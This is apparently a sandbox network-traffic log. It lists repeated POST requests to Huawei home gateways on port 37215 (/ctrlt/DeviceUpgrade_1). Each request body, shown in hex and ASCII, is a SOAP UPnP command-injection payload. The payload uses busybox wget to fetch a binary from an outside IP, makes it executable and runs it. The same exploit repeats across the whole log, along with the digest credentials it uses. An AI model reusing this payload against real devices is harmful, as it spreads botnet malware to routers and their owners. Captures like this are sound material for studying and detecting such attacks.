                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.982105970 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:05.482212067 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:06.442034960 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:08.362076998 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:12.169794083 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:19.849689007 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:35.212877035 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:18:06.951675892 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      81192.168.2.1450294197.236.159.11637215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:04.700675964 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:05.054060936 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:05.578186989 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
